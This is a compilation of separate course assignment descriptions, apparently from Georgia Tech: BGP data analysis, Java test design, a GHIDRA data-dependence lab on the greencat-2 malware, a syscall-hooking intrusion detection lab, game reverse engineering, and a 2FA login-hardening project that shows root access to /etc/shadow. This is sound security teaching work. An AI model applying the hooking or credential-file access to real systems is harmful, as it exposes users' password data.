this. Gradescope imposes a hard time limit of 40 minutes for a grading session. We have no control over this and will not be able to make any allowances if your submission does not complete within that time limit. For this project, we will be using BGPStream, an open-source software framework for live and historical BGP data analysis, supporting scientific research, operational monitoring, and postevent analysis. BGPStream and PyBGPStream are maintained by the Center for Applied Internet Data Analysis (CAIDA). A high-level overview about how the BGPStream tool was developed was published by CAIDA in BGPStream: A Software Framework for Live and Historical BGP Data Analysis. This paper provides useful background and practical examples using BGPStream, so be sure to read it. Additionally, you should read African peering connectivity revealed via BGP route collectors, which provides a practical illustration of how the BGP collection system works.All the tasks are to be implemented using the Python interface to BGPStream. You are strongly encouraged to browse the following resources to familiarize yourself with the tool, and to run the example code snippets:As will become apparent when you peruse the above documentation and tutorial information, the majority of BGPStream use cases involve gathering data – either live or historical – directly from the Route Collectors (which we refer to simply as “collectors”). The code for accessing a collector or set of collectors directly usually looks like this: stream = pybgpstream.BGPStream( record_type=”updates”, from_time=”2017-07-07 00:00:00″, until_time=”2017-07-07 00:10:00 UTC”, collectors=[“route-views.sg”, “route-views.eqix”], filter=”peer 11666 and prefix more 210.180.0.0/16″) Each of the parameters to pybgpstream.BGPStream() winnows the data retrieved from the collector(s). Because we are using pre-cached historical data in this project, you will not need to specify a collector or a time range. You also don’t need to use any additional filtering.For this project, you can use set up and configure your streams with: stream = pybgpstream.BGPStream(data_interface=”singlefile”) stream.set_data_interface_option(“singlefile”, type, fpath) where type is one of [“rib-file”, “upd-file”][1] and fpath is a string representing the path to a specific cache file. When processing multiple files, you will create one stream per file. It is critical that you understand the BGP record format, especially the meaning and content of the fields (data attributes). A detailed explanation of BGP records and attributes can be found in RFC 4271: A Border Gateway Protocol 4 (BGP–4).It’s also worth spending some time exploring the provided data using the BGPReader command line tool (“a command line tool that prints to standard output information about the BGP records and the BGP elems that are part of a BGP stream”). Doing so will be particularly helpful in understanding how the fields described in RFC 4271 and elsewhere map to the BGP record and BGP elem concepts used by BGPStream and PyBGPStream.Because PyBGPStream allows you to extract the BGP attributes from BGP records using code, you will not have to interact with the BGP records in this format, but it is, nevertheless, helpful to see some examples using BGPReader to understand the fields. The next section showsHere, we will show sample command line output from BGPReader for illustration purposes:# read records from an update file, filtering for IPv4 only bgpreader -e –data-interface singlefile –data-interface-option upd-file=./rrc04/update_files/ris.rrc04.updates.1609476900.300.cache –filter ‘ipv 4’ # read records from a rib file, filtering for IPv4 only bgpreader -e –data-interface singlefile –data-interface-option rib-file=./rrc04/rib_files/ris.rrc04.ribs.1262332740.120.cache –filter ‘ipv 4’ The box below contains an example of an update record. In the record, the “|” character separates different fields. In yellow we have highlighted the type (A stands for Advertisement), the advertised prefix (210.180.224.0/19), the path (11666 3356 3786), and the origin AS (3786). The following is a Routing Information Base (RIB) record example. Consecutive “|” characters indicate fields without data.R|R|1445306400.000000|routeviews|route-views.sfmix|||32354|206.197.187.5|1.0.0.0/24|206.197.187.5|3235 4 15169|15169||| Do not rely on the directory layout of the provided data. Gradescope does not mirror the directory layout from the provided files. Specifically, in your final submission, do not directly access the filesystem in any way and do not import all or part of either os or pathlib. All filesystem interaction will occur via PyBGPStream and the file paths will be taken from the Python list in the parameter named cache_files that is passed to each function. Locate the directory rrc04/rib_files included with this assignment. This directory contains RIB dump files. Each filename (e.g., ris.rrc04.ribs.1262332740.120.cache) includes the collector’s name (ris.rrc04), the type of data (ribs), and the Unix timestamp of the data (1262332740, which you can convert to a date via either of the two above links). Each of the cache files is a snapshot of BGPM data collected by the collector at the time of the timestamp. In the rest of this assignment the term “snapshot” refers to the data in a particular cache file. Do not pull your own data. Your solution will be graded using cached data only. You will need to write code to process the cache files. Each entry in cache_files is a string containing the full path to a cache file. To access a given path, your code will need to set up the appropriate data interface in your BGPStream() constructor:stream = pybgpstream.BGPStream(data_interface=”singlefile”) stream.set_data_interface_option(“singlefile”, type, fpath) where type is one of [“rib-file”, “upd-file”] and fpath is a string representing the path to a specific cache file. When processing multiple files, you will create one stream per file.Tip: Your code shouldn’t make assumptions about the number of cache files. In this task you will measure the growth over time of Autonomous Systems and advertised prefixes. The growth of unique prefixes contributes to ever-growing routing tables handled by routers in the Internet core. As optional background reading, please read the seminal paper On Characterizing BGP Routing Table Growth. This task will use cache files from the rib_files subdirectories. These are RIB files, so you will pass “rib-file” in your call to set_data_interface_option(). Using the data from cache files, measure the number of unique advertised prefixes over time. Each file is an annual snapshot. Calculate the number of unique prefixes within each snapshot by completing the function unique_prefixes_by_snapshot(). Make sure that your function returns the data structure exactly as specified in bgpm.py. This task will use cache files from the rib_files subdirectories. These are RIB files, so you will pass “rib-file” in your call to set_data_interface_option(). Using the data from the cache files, measure the number of unique Autonomous Systems over time. Each file is an annual snapshot. Calculate the number of unique ASes within each snapshot by completing the function unique_ases_by_snapshot(). Make sure that your function returns the data structure exactly as specified in bgpm.py. Note: Consider all paths in each snapshot. Here, we consider all AS that appear in the paths (not only the origin AS). You may encounter corner cases of paths with the following form: “25152 2914 18687 {7829,14265}”. In this case, consider the AS in the brackets as a single AS. So, in this example, you will count 4 distinct ASes. This task will use cache files from the rib_files subdirectories. These are RIB files, so you will pass “rib-file” in your call to set_data_interface_option(). Using the data from the cache files, calculate the percentage growth in advertised prefixes for each AS over the entire timespan represented by the snapshots by completing the function top_10_ases_by_prefix_growth(). Make sure that your function returns the data structure exactly as specified in bgpm.py. Consider each origin AS separately and measure the growth of the total unique prefixes advertised by that AS from its first appearance to its last appearance. To compute this, for each origin AS:Note: Don’t make assumptions about when an AS can appear – an AS is not guaranteed to appear in every snapshot, nor is it guaranteed to appear in the first and lastsnapshots.0, 124, 215, 512, 0 The percentage increase would then be:= 3.13 or 313%Note: There are no ties, so don’t worry about implementing tie-breaking. Edge case: When calculating the prefixes originating from an origin AS, you may encounter paths of the following form: “25152 2914 18687 {7829,14265}”. This is an edge case, and it should affect only a small number of prefixes. In this case, you consider the entire set of AS “{7829,14265}” as the origin AS.In this task you will measure if an AS is reachable over longer or shorter path lengths as time progresses. Towards this goal you will measure the AS path lengths, and how they evolve over time.This task will use cache files from the rib_files subdirectories. These are RIB files, so you will pass “rib-file” in your call to set_data_interface_option(). Using the data from the cache files, calculate the shortest path for each origin AS in each snapshot by completing the function shortest_path_by_origin_by_snapshot(). Make sure that your function returns the data structure exactly as specified in bgpm.py.For each snapshot, you will compute the shortest AS path length for each origin AS in the snapshot by following the steps below:AS and ”2914” appears twice in the path. This is a path of length 4.25152 25152”), the path has length 1 and should be ignoredExample: The length of the AS path “25152 2914 18687 {2914,14265} 2945 18699” is 6.Example: The length of the AS path “25152 2914 18687 18687 {18687}” is 4. The entries “18687” and “{18687}” are distinct, so you only deduplicate “18687”. In this task, we will measure how long prefix Announcements last before they are withdrawn. This matters because, when a prefix gets Advertised and then Withdrawn, this information propagates and affects the volume of the associated BGP traffic. Optional background reading on this topic can be found in The Shape of a BGP Update. This task will use cache files from the update_files subdirectories. These are update files, so you will pass “upd-file” in your call to set_data_interface_option(). Using the data from the cache files, we will measure how long prefix Announcements last before they are withdrawn by completing the function aw_event_durations(). Make sure that your function returns the data structure exactly as specified in bgpm.py. In defining Announcement Withdrawal (AW) events, we will only consider explicit withdrawals. An explicit withdrawal occurs when a prefix is advertised with an (A)nnouncement and is then (W)ithdrawn. In contrast, an implicit withdrawal occurs when a prefix is advertised (A) and then re-advertised (A) – usually with different BGP attributes. To compute the duration of an Explicit AW event for a given peerIP/prefix, you will need to monitor the stream of (A)nnouncements and (W)ithdrawals separately per peerIP/prefix pair. In this task you will identify and measure the duration of Real-Time Blackholing (RTBH) events. You will need to become familiar with Blackholing events. Good resources for this include RFC7999, Section 2, BGP communities: A weapon for the Internet (Part 2), and the video Nokia – SROS: RTBH – Blackhole Community. This task will use cache files from the update_files_blackholing subdirectories. These are update files, so you will pass “upd-file” in your call to set_data_interface_option().Using the data from the cache files, we will identify events where prefixes are tagged with a Remote Triggered Blackholing (RTBH) community and measure the time duration of the RTBH events by completing the function rtbh_event_durations(). Make sure that your function returns the data structure exactly as specified in bgpm.py. The duration of an RTBH event for a given peerIP/prefix pair is the time elapsed between the last (A)nnouncement of the peerIP/prefix that is tagged with an RTBH community value and the first (W)ithdrawal of the peerIP/prefix. In other words, we are looking at the stream of Announcements and Withdrawals for a given peerIP/prefix and identifying only explicit withdrawals for an RTBH tagged peerIP/prefix. To identify and compute the duration of an RTBH event for a given peerIP/prefix, you will need to monitor the stream of (A)nnouncements and (W)ithdrawals separately per peerIP/prefix pair. Submit bgpm.py to Gradescope. Please refer to the Georgia Tech Honor Code located here:https://policylibrary.gatech.edu/student–affairs/academic–honor–code We strictly enforce Section 3. Student Responsibilities including these prohibited actions: In addition, the usage of AI tools such as ChatGPT in assisting and/or completing part or all of your project is explicitly prohibited. Even if they are used for just one task, that constitutes an academic integrity violation and you will receive a 0 for the entire project. The same holds true if you are found to have accessed and utilized external resources such as non-CAIDA GitHub repositories containing partial or complete solutions, other student solutions (past or present), or solutions uploaded to sites like CourseHero. Even if said resources are used for just one task, that constitutes an academic integrity violation and you will receive a 0 for the entire project. Official resources and those referenced in the project document such as the official Python documentation, official CAIDA documentation, code examples, repositories, etc. do not need to be cited. If you reference unofficial coding/programming resources such as W3Schools, Stack Overflow, etc. please cite them in your code. If you are struggling with certain tasks, ask for help from your peers and/or the teaching staff on Ed Stem, come to office hours, and if all else fails, move on to other tasks so you can at least get partial points on the project. That is far better than receiving a 0 for the entire project due to an academic integrity violation.[1] You can see a complete list of types by running: bgpreader –data-interface singlefile -o?
In this project, you will be developing a Java application, transformtxt, using an agile, test-driven development process across multiple deliverables. For this assignment you will use version 17 of the Java Development Kit. You will receive one grade for the entire project, but each deliverable must be completed by its own due date and all deliverables will contribute to the overall project grade.transformtxt is a command-line utility written in Java with the following specification:transformtxt allows for simple text manipulation of the contents of a file.transformtxt [OPTIONS] FILEThe program transformtxt performs basic text transformation on the lines of text from an input file. It is invoked as a command-line tool using the syntax described above, after compilation. The program writes the transformed text to the standard output and errors or usage messages to the standard error without modifying the input file. The FILE parameter is required and must be the last parameter as shown above. The only options allowed in the program, which are optional, delimited by the left [ and right ] brackets, may be provided in any order and are described as follows:The last command-line parameter provided is always treated as the filename, as shown in the syntax section, while OPTIONS flags can appear in any order and parsed as they appear from left to right. This means that the following two commands are equivalent when executed on the command line:In the above examples, (Example 1) parses -x first, then -t, and finally input.txt while (Example 2) parses -t first, then -x, and finally input.txt. These two examples will result in the same output (assuming that the same input.txt is used for both) because the parsing of options is independent of their execution order. The order of execution for each option is given in the diagram below (note that the colors and border lines are there for ease of viewing):The above diagram of the execution order of options can also be described as follows:Usage: transformtxt [-s num | -x | -g | -r old new | -t length | -w spacing ] FILE The cases below show scenarios where transformtxt shall result in an error according to a specific option. The examples described here can also be seen in JUnit 5 form on the MainTest.java file provided to you in the below sections. In the following, “↵” represents a newline character. This part of the document is provided to help you track where you are in the individual project. This section will be updated in future deliverables.ProvidedExpectedProvided: TBDExpected: TBDProvided: TBDExpected: TBDDeliverable 1 is split up in two parts: Part I and Part II. Follow the instructions for each of the parts as described below.Your task for this deliverable is to generate 50 to 90 (inclusive) test frames for the transformtxt utility using the category-partition method presented in lesson P4L2. Make sure to watch the lesson and demo before getting started.When defining your test specifications, your goal is to suitably cover the domain of the application under test, including relevant erroneous input and input combinations. For example, if you were testing a calculator, you may want to cover the case of division by zero.Do not manually generate combinations of inputs as single choices. Instead, use multiple categories and choices with necessary constraints for the tool to generate meaningful combinations. Using the calculator example, you should not offer choices “add”, “multiple”, and also “add and multiply” in a single category – an example of what not to do can be found in calculator-manual-combinations.txt. In particular, make sure to use constraints (error and single), selector expressions (if), and properties appropriately, rather than eliminating choices, to keep the number of test cases within the 50 to 90 inclusive range.The domain for this assignment is the Java application, so anything that the shell would reject, such as unmatched double quotes, will not reach the application. This means that you must test for invalid input arguments (such as Example 3 above), but you don’t need to test for errors involving parsing the command-line arguments before they’re sent to the Java application. In addition, you may assume that main will be called with a valid args array, meaning that values like null will not be passed.We are in the process of rewriting the TSLgenerator. For this semester, we have a portion of this rewrite available to students called the TSLChecker, which is optional, but highly recommended to use. The TSLChecker is a tool that will check for errors that are not normally caught in the TSLgenerator for some catpart files.If you choose to use this tool, the recommended use is to run the tslchecker on your catpart file before you run the TSLgenerator.To run the tslchecker, pass it the path to your catpart file as so:./tslchecker path/to/catpart.txtThe tslchecker is available for the following operating systems:You will use the TSLgenerator tool to generate test frames starting from a TSL file, just like we did in the demo for lesson P4L2. Versions of the TSLgenerator for Linux, Mac OS, and Windows, together with a user manual, are available at:We are also providing the TSL file for the example used in the lesson, cp-example.txt, for reference, as well as an example for explaining values, tsl-na-example.md.Since the TSL generator is a command-line tool, it must be run from the command line, as we do in the video demo, rather than by clicking on them. The syntax for running the tool is [–manpage] [-cs] infile [-o outfile]where is the name of the TSLgenerator executable and infile is the input file to the TSL program, i.e., the catpart.txt file. You can find out more information by running the tool with the –manpage command, which prints the manual of the TSL generator[1].If you encounter issues while using the tool, please post a public question on Ed Discussion and consider running the tool on a different platform, if you have the option to do so. For reference, Gradescope will execute the tool on a Linux platform. In this second part of the deliverable, you will create actual test cases implementing the test specifications you created in Part I. As discussed in the lesson on the category-partition method, each test frame is a test specification that can be instantiated as an individual concrete test case. To do so, you should perform the following tests:This is a skeleton of the Main class of the transformtxt utility, which we provide so that the test cases for transformtxt can be compiled. It contains an empty main method and a method usage, which prints, on standard error, a usage message that should be called when the program is invoked incorrectly. In case you wonder, this method is provided for consistency in test results.This is a test class with a few test cases for the transformtxt utility that you can use as an example; it corresponds to the examples of usage of transformtxt that we provided. In addition to providing this initial set of tests, class MainTest also provides some utility extensions and methods that you can leverage/adapt and that may help you implement your own test cases. We encourage you to use the methods to ease your design process.This is an empty test class in which you will add your test cases, provided for your convenience.This is a JUnit 5 extension class to facilitate capturing the standard output and standard error, which are needed to test the transformtxt application. It is used on the MainTest.java file for reference and provides two methods to capture output from Main.JUnit 5 library to be used for the assignment.// Frame #: Your test frames should contain enough information to create relevant test cases. If you cannot implement your test frames as useful JUnit tests (e.g., because the test frames do not provide enough information), you should revisit Part I. Extending the calculator example, if your test frame specified a numerical input, and you realized that you should use both negative and positive numbers in your JUnit test case, you should revise your categories and choices so that this is reflected in your test frames.If you are uncertain what the result should be for a test, you may make a reasonable assumption on what to use for your test oracle. While you should include a test oracle, we will not grade the accuracy of the test oracle itself. Feel free to reuse and adapt, when creating your test cases, some of the code we provided in the MainTest class. MainTest is provided for your convenience and to help you get started. Whether you leverage the MainTest class or not, your test cases should assume (just like the test cases in MainTest do) that the transformtxt utility will be executed from the command line, as follows:java -cp edu.gatech.seclass.transformtxt.Main For this deliverable, do not implement the transformtxt utility, but only the test cases for it. This means that most, if not all of your test cases will fail, which is expected and fine. javac -cp lib/* -d classes src/edu/gatech/seclass/transformtxt/*.java test/edu/gatech/seclass/transformtxt/*.javajava -cp classes:lib/* org.junit.platform.console.ConsoleLauncher –select-class edu.gatech.seclass.transformtxt.MyMainTest[3]submission.txt As soon as you submit, Gradescope will verify your submission by making sure that your files are present and in the correct location, as well as a few additional minor checks.[4] If you pass all of these checks, you will see a placeholder grade of 10 and a positive message from Gradescope. Otherwise, you will see a grade of 0 and an error message with some diagnostic information. Please note that:If you need clarification or have questions regarding Gradescope output, please post privately on Ed Discussion (we will make it public if appropriate) and make sure to add a link to the Gradescope results and any information that may be relevant.The bottom line is that, to make the interaction efficient, you should make your posts as self-contained and easy-to-check as possible. The faster we can respond to the posts, the more students we can help. Answer: In fairness to everyone, we cannot discuss future deliverables. You will have to wait to find out the details of deliverable 2 when it’s released.Answer: No, for part 2 you can only use the test frames that were generated in part 1.Answer: Yes, the file is also an input to the program, so it should be considered when testing.Answer: Although there are no restrictions on your test suite design, testing the limits of data types and file sizes is out of the scope for this assignment.Answer: Yes, that’s no problem. This is expected since the main method is empty, so most tests won’t pass.Answer: Yes, you may (and are encouraged to) use the example test cases to devise your own, in addition to using the structure and test methods provided.[1] On Linux and Mac systems, you may need to change the permissions of the files to make them executable using the chmod utility. To run the tool on a Mac for instance, you should do the following, from a terminal:chmod +x TSLgenerator-mac[2] On some platforms, you may need to first create directory “classes”.[3] If using a Windows-based system, you may need to run java -cp “classes;lib/*” org.junit.platform.console.ConsoleLauncher –select-class edu.gatech.seclass.transformtxt.MyMainTest instead.[4] Although we tested the checker, it is possible that it might not handle correctly some corner cases. If you receive feedback that seems to be incorrect, please contact us on Ed Discussion.
Let us return to the events which occurred in 2014 at a small start-up company in Monroe, CT.You have been hired by a new small to medium sized eCommerce start-up based in Monroe, CT to investigate the insidious greencat-2 malware which was infecting their accounting computers. You are just beginning to understand the malware’s behavior. You have reverse engineered what appears to be a key malware functionality which exfiltrates files to the command and control server, and this is leading you to suspect that greencat-2 may have been responsible for the fraudulent customer payment directions.Suddenly, your phone rings. Your caller ID shows that it is the CEO of the eCommerce start-up!“Hello?” you ask.“The investors are getting nervous! The lawyers are asking questions! The customers aren’t buying our eCommerce product!” he yells.“I’m working as fast as …” you say, but he interrupts.“We need to provide some proof that no customer data was stolen! I need you to get me that proof by next week, or you’re not getting paid!” he says before hanging up.Your mind races… what can you do? How can you provide proof?Data dependence! You suddenly realize that you can quickly produce a data dependence graph. The lawyers can spend a few weeks piecing it together, but that will provide proof of what greencat2 could do with the data it handled. You hurriedly rush to begin writing a GHIDRA plugin to compute data dependence — not waiting even one second before getting started (hint hint) … you know that this will take a lot of work to complete by the CEO’s deadline (hint hint).Instructions:An accurate Data Dependence Graph (DDG) is the most sought-after building block in the program analysis universe. Malware analysis tools require a DDG to answer any questions about the malware’s operation. You’ve probably seen multiple applications of DDGs in the research papers up to this point. Unfortunately, static analysis hurtles such as path explosion and aliasing force tool developers to make difficult implementation tradeoffs which limit the accuracy of their DDGs. In this lab, you will combat path explosion and aliasing with the goal of building a best-effort DDG — another essential building block for malware analysis. After completing this lab, I encourage you to go a step further and write a simple analysis script to automatically extract any DDG paths within GreenCat that can exfiltrate data from files on the victim system.Loop every instruction in every basic block in every function in your greencat-2 disassembly (from before).Compute the data dependence of each instruction. You can design any methods or data structures you wish to accomplish this. You can use any GHIDRA SDK APIs that will help you (but none exist that can compute data dependence for you).Generate a DOT directed graph representing the data dependence of all the instructions in each function. Specifically, one DOT graph per function — name each DOT graph (called a “digraph” in the DOT file format) the address of the function.Each node in your DOT directed graph should be the address of an instruction (only ONE node per instruction address). Node labels can be just the instruction addresses. The edges in your DOT directed graph file should go from each instruction to any instructions which that instruction is data dependent on. The order of the edges in the DOT directed graph file does not matter.Consider this example from the greencat-2 binary. Here are the instructions in the function starting at address 0x401000 in greencat-2:The DOT directed graph generated by your tool for this function should be as follows:Note: The following example is for full credit, which includes tracking the calling conventions and arguments of CALL instructions.You tool should process every function in the greencat-2 binary. All DOT graphs for all the functions should be output in a single “.dot” file. So, after you GHIDRA plugin finishes executing, you should have a single “.dot” file with many digraphs in it (one digraph per function).The order of the edges in the DOT directed graph file does not matter. Also see: https://stackove rflow.com/questions/1494492/graphviz-how-to-go-from-dot-to-a-graphAs always: Post any questions or ideas on Ed Discussion! Even code snippets are fine, as long as they do not give away a key answer to this assignment. Class collaboration is encouraged — It’s us versus malware! If you’re not sure if your post is safe, send it to the Prof/TA in a private post to verify.Lab Requirements / FAQ (MUST READ):This section contains some frequently asked questions and requirements that students should adhere to when working on this assignment.How do CALL instructions work for this assignment? How are they calculated?CALL instructions for this assignment are similarly calculated to Lab 3. To get full credit you must properly be tracking Calling conventions and stack dependency.Do we need to calculate dependencies between functions?No. Similar to Lab 3 (and for all scripting labs) functions will be considered independently, meaning you do not need to link dependencies between functions. This is the purpose of the START keyword. The START keyword should be used to express that a dependency originated outside of the local function.Grade: 100pointsGrading Criteria:The grade will be based on how many instructions and functions your plugin handles correctly (i.e., the edges and the labels in the DOT graph are correct).Warning: Static memory read/write tracking is an extremely hard problem in general — I do not expect you to completely solve it for this lab! If you miss some complex memory read/write dependencies (there are very few in this assignment), you will still get a good grade.Here is what the team will look for while grading:Register dependencies: Register reads/writes are the easiest case of dependencies.Direct push & pop dependencies: This requires that your plugin track changes of the stack pointer inside each function. Hint: Since we do not know its true value, pretend like ESP = 0 at the start of each function, and then track its changes for each instruction. Note that function args will be above ESP at the start of the function.Static memory positions: These are memory locations that GHIDRA gives a name to and accesses via that name (e.g., “mov [ebp+var_4], eax” or “mov dword_429C48, eax”). This requires your plugin to note each instruction which writes to that memory position.Everything else: There are very few complex memory read/write dependencies (e.g., those which include aliasing) in the functions we will grade. I did not find any cases of aliasing in my cursory pass over the code. If you are concerned about any cases of complex memory read/write dependencies, then please post on Ed Discussionand we will be glad to check it out.The grade will be based on how many instructions and functions your plugin processes correctly, and is ultimately based on your graph submission (DOT file).Data Dependence accuracy of top 10 instruction mnemonics are worth 5% of the total grade each (mov, add, sub, cmp, test, xor, push, pop, lea, all forms of jump). For example, if 20% of your mov instructions are wrong (missing a dependent or has an erroneous dependent) then you will lose 1% of the total 100 points.Data Dependence accuracy of all other instruction types are collectively worth 15% of the total grade. For example, if 30% of the other instructions are wrong (missing a dependent or has an erroneous dependent) then you will lose 5% of the total 100 points.Edge accuracy is worth 30% of the total grade. For example, if 10% of your edges are wrong (missing or have an erroneous extra edge) then you will lose 3% of the total 100 points.If you cannot get any of the cases above to work, do not worry!! Please comment at the top of your file which of these cases that you COULD NOT get to work, and the TA and I will be lenient while grading.We will only grade the functions that you commented in Lab 2. The maximum deduction is 100. There will be no negative grades.Note: Grades in sections are rounded down to the nearest percent.Call Tracking:Up to 20 additional points will be awarded for properly tracking the DD of CALL arguments Note: This will require using GHIDRA ’s APIs to determine the number of function arguments. For example:40156B push 3Ch ; …40156D xor ebx, ebx ; …40156F lea eax, [ebp+buf] ; …Teams:This assignment can be done individually or in a team of 2. Please join a group in Gradescope if you are collaborating.Do not create or join a group in Canvas. Canvas groups are different from Gradescope groups.New to Gradescope? This link provides instructions for how to create groups in Gradescope: https://help.gradescope.com/article/m5qz2xsnjy-student-add-group-membersZoom can also provide the ability to collaborate and video conference with your teammate.Submission Instructions:Upload the following to the Lab 3 Assignment in Gradescope:The DOT file output by your GHIDRA plugin, named “submission.dot” which contains digraphs for every function in the greencat-2 binary.Your GHIDRA plugin code, named either “plugin.py” or “plugin.java” depending on the chosen language. We reserve the right to run all submitted code, through automated means or otherwise, and if it is found that your code does not output equivalent to your original dotfile submission then you will also receive a zero.Be advised, please submit (1) and (2) separately, do NOT zip them together.Note: Gradescope will only check the formatting of your submission. Gradescope will not automatically check the correctness and provide a grade.Note: You can download the webc2-greencat-2.7z file directly into your lab environment. After you are done with this lab, you can submit your files directly from the lab environment (Highly recommended). Doing this will help you avoid transferring the file from the lab environment to your personal computer.Transferring Files:To transfer files from your personal device to the lab environment:Create a zip folder of all the files that you would like to transfer to the lab environment.Every GT student has Box and OneDrive accounts given free by the institution. Login to either of those two and upload the desired files.Now go back to the lab environment and login to either of those two services where you uploaded you zip folder. Download folder to the the lab workspace and use the appropriate 7z command to unzip your folder.What to do when you encounter technical difficulties?If you are experiencing technical difficulty such as being unable to access the lab environment, please submit a ticket to the “Digital Learning Tools and Platforms” team at https://gatech.servicenow.com/continuity. And on the ticket, please put “Route to the DLT Team” at the top of the ticket because it will help the Service Desk know where to send it.Grades have been released. How do I view my raw feedback?GradeScope truncates raw feedback over a certain size. For this reason, we’ve provided both a plaintext version of the JSON feedback, and a Base-85 encoded and GZIP compressed version of the JSON feedback as well. The encoded version is the last test-case in GradeScope (all the way at the bottom). If you find that your plaintext feedback is truncated in GradeScope and need the full feedback for programmatic review, please try decompressing the encoded version. The following python snippet is an example of how one may retrieve the plaintext information:
“Good work on that report! The customer was super impressed!”There seems to be a trend in your boss’ tone of voice versus the amount of work he is about to assign to you…“They were so impressed, in fact, that they wanted you to create a host-based IDS for them that can monitor the behavior of a program they wrote.”That doesn’t even seem like part of your job description, you think to yourself.“Just make sure you can report on the malicious activities it does.”Your boss also seems pretty fixated on this two-week cycle, you think as you start Googling for more documentationActions.VM link:OneDrive: cs6264_lab4.ovaLinks to an external site.Google Drive: https://drive.google.com/file/d/1Q8D-ltf24uCkTIEFkteDkp_iWXzOHm1G/view?usp=sharingLinks to an external site.md5 checksum:b92c8108ab2dae20b7ccf2bff63cfefe cs6264_lab4.ovaSupplementary Materials AssignmentThe purpose of this assignment is to apply your knowledge of IDS’s learned in class to implement your own host-based IDS to detect behaviors a malware may have during runtime.Please implement an IDS on the provided VM that can report on the syscalls that are being made by the binary. As a hint, you will want to implement this by implementing syscall hooking. Deliverables RubricRubricSome RubricTotal Points: 105 CS6264 Project 4 Supplementary Materials Supplementary Materials Project 4 Overview 1. Hook 21 System Calls 2. Implement Anomaly Detection Part 1 : System call hooking – Syscall hints mkdir : You can use kprintf() to print out the register content to debug and make sure correct argument values are in the correct registers Part 1 : System call hooking – Syscall hints fstatat: fstatat not in syscalls.h You may use newfstatat for kprobe instead Note: Always check the man page of the syscalls for more information Part 1 : System call hooking – Syscall hints wait4: An example can be found here: They hook the do_fork function; you will need to find the address for wait4 https://elixir.bootlin.com/linux/v5.3/source/samples/kpr obes/kprobe_example.c Part 1 : System call hooking Kprobes: Example from the kernel: https://elixir.bootlin.com/linux/v5.3/source/samples/kprobes/kprobe_ example.c Documentation: https://www.kernel.org/doc/Documentation/kprobes.txt Tutorial: https://www.kernel.org/doc/ols/2006/slides/kprobes.html Part 2 : Anomaly Detection How to design the anomaly detection with what you have learn in part 1? Part 2 : Anomaly Detection Syscall sequence pattern -> normal profile Use subsets of syscall sequence as the behavior identifier to define a normal behavioral database Part 2 : Anomaly Detection Example Implementation: Sliding Window Pick a proper k value: you can choose 6 if you don’t bother to test nuances for performance and accuracy Part 2 : Anomaly Detection – Sliding Window K = 4 example, move 1 window slot at a time to model the behaviors forest representation of sequence of system calls Note: you can convert corresponding syscalls to the syscall numbers for easier representation Part 2 : Anomaly Detection – Sliding Window Sample database of normal behavior Note: In case you want to know more details and the reasoning behind, refer to the paper: http://wenke.gtisc.gatech.edu/ids-readings/unix_process_self.pdf More on IDS: https://www.cs.fsu.edu/~engelen/SnyderThesis.pdf Example implementation of Sliding window: https://www.geeksforgeeks.org/window-sliding-technique/ Part 2 : Anomaly Detection Your anomaly detection system could divided into 2 phases: 1. Training Phase 2. Testing Phase Part 2 : Anomaly Detection – Training Phase To establish a normal profile, run through 100ish testing runs for all benign behaviors with our given binary to a point that your IDS does not or rarely alert on benign syscall sequences. Like shown in the plot, the number of new syscall sequences not increase drastically. Then you should conclude that the training phase is DONE! We can accept an error rate upto 8% Part 2 : Anomaly Detection – Training Phase To run with what you have with Part 1: sudo insmod hooks.ko ./target input (100ish testing runs) sudo rmmod hooks.ko Part 2 : Anomaly Detection – Normal DB storage Where to store the normal database? 1. Store in memory (heap memory) 2. Store in database(mysql, sqlite, etc…) 3. Store in static files (db.txt) Part 2 : Anomaly Detection – Testing Phase As mentioned, we accept 8% error rate for your anomaly detection. Bonus: Malicious behavior detection What’s defined as Malicious? (Refer to the tutorial last section)
Study of the game “Macadam Bumper” released for TO9 (1989) Entry point: https://www.sylvain-huet.com/#macadam Resources:http://dcmoto.free.fr/documentation/index.htmlhttps://doc.discosoft.fr/motoexpl/http://justsolve.archiveteam.org/wiki/Tokenized_BASIChttp://nostalgies.thomsonistes.org/teo_home.htmlhttps://www-apr.lip6.fr/~mine/mess/to7.html.enhttp://jeuxvideos8090.free.fr/index.php?Id_Soft=249Questions:List the components of the game archive and their rolesDescribe the boot sequence up to the main menu displayDescribe the memory mapping of the different components when the player clicks on “play”Describe how the pinball loading worksFind the menu selection function and the “game_loop” functionExpected deliverables:A Ghidra project archiveA complete report describing all collected information and all discoveries about the gameBonus exercise (50xp): Reverse engineer and describe the format of the pinball files to be loaded
Learning Objectives: The goal of this project is to harden password-based authentication by including information obtained from a second factor (two-factor Authentication or 2FA). We will use the Linux login command implementation to explore this. Although somewhat contrived, the motivation for the 2FA scheme explored in this project is similar to the password hardening paper discussed in course lectures. More specifically, information maintained by the system to check the validity of a login request is updated after each login request to limit the effectiveness of offline guessing attacks. The following are the learning objectives of this project.To keep it simple, this project focuses only on hardening the basic login scheme for a desktop/laptop system. However, this scheme can be extended to provide password hardening for remote logins.Project Setup:Note: The link to the VM will be posted on an Ed Discussion pinned post. For this project, you will be provided with an Ubuntu-based Virtual Machine (VM). This VM was tested on Oracle VM Virtual box 7.0 and can be directly imported to it[1]. This VM has a default account “cs6238” setup with normal user access privileges. You will use root, to access a file as root, open a terminal, type “sudo su”, enter the “cs6238” password, and then access the file.Password for the “cs6238” account is “cs6238”. You should not include “” while entering the password. When you log into account “cs6238”, follow these instructions: As you can see from Fig 1., the file ‘/etc/shadow’ can be accessed as a root user. Fig 1. Reading file ‘/etc/shadow’ from root Fig2. Desktop folder This folder contains:Additional details of these code files and the executable will be described later.IMPORTANT NOTE: We have observed that students tend to erase or delete the /etc/passwd and /etc/shadow file while working on this project and lose access for login into the VM. It would be safe to take snapshots of your VM before starting the project and while progressing through the project.We have also created a copy of the files namely /etc/passwd.cs6238 and /etc/shadow.cs6238 on the VM in case you delete or erase or modify them. Since you have root access it would be safe to have your own copy and exercise caution while updating these files.Prior to starting on the project, you should familiarize yourself with the working of the login command in Linux. In particular, you should be able to answer the following questions.There are plenty of online resources for finding answers to these questions. To help you get started, see the section “GETTING STARTED ON LINUX LOGIN/PASSWORDS” in the AppendixSection. Getting Started: To help you get started, we have provided two Python code files to help you better understand the inner working of the system while creating and logging in users. After understanding the code of create_user.py and check_login.py, you are ready to work on this project.In this task, you need to implement 2FA using the provided token generator (TG) executable, which serves as a second factor. The 2FA method uses the tokens generated by TG to harden the login mechanism used in Linux.Typically, a unique second factor source/device is associated with a user (i.e., your phone for Duo 2FA used by 